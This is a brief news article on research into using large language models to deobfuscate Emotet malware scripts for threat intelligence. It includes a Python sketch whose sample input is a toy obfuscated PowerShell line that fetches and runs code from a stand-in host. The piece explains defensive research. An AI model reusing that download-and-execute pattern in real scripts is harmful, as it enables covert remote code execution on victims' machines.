A recent study explores how large language models (LLMs), the type of artificial intelligence behind tools such as ChatGPT, can be used to automate cyber threat intelligence pipelines, focusing on intelligence extracted from malware samples.
In their work, Constantinos Patsakis, a member of the CYMEDSEC project from the University of Piraeus (Greece), and his colleagues Fran Casino from Universitat Rovira i Virgili (Spain) and Nikolaos Lykousas from Data Centric (Romania) evaluated four prominent LLMs on real-world malicious scripts from the Emotet malware campaign.
Their findings show that although these models are not yet perfectly accurate, they have significant potential for efficiently deobfuscating malware payloads, i.e. the operative parts of a piece of malware. The study also underscores the importance of fine-tuning LLMs for specialized tasks, suggesting that such optimization could lead to future AI-powered threat intelligence systems capable of combating obfuscated malware.
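To make the idea concrete, here is a minimal sketch of the kind of query such a pipeline might issue. It is not the authors' pipeline: the OpenAI Python client, the model name, and the prompt wording are all illustrative assumptions, and the "obfuscated" script is a harmless toy stand-in rather than a real Emotet sample.

```python
# Minimal sketch (assumptions: OpenAI Python client, illustrative model/prompt).
# Real malware samples should only be handled in an isolated analysis environment.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# Toy stand-in for an obfuscated PowerShell dropper (harmless, .invalid domain).
obfuscated_script = r"""
$a='ht'+'tp://exa'+'mple.invalid/payload';
IEX (New-Object Net.WebClient).DownloadString($a)
"""

response = client.chat.completions.create(
    model="gpt-4o",  # assumption: any capable chat model
    messages=[
        {"role": "system",
         "content": "You are a malware analyst. Deobfuscate the script and "
                    "list any URLs, file paths, and commands it would execute."},
        {"role": "user", "content": obfuscated_script},
    ],
    temperature=0,  # deterministic output suits extraction tasks
)

# The model's answer would feed the downstream threat-intelligence steps,
# e.g. extracting indicators of compromise such as the reconstructed URL.
print(response.choices[0].message.content)
```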
Read the full article here.
Image credits: Igor Omilaev on Unsplash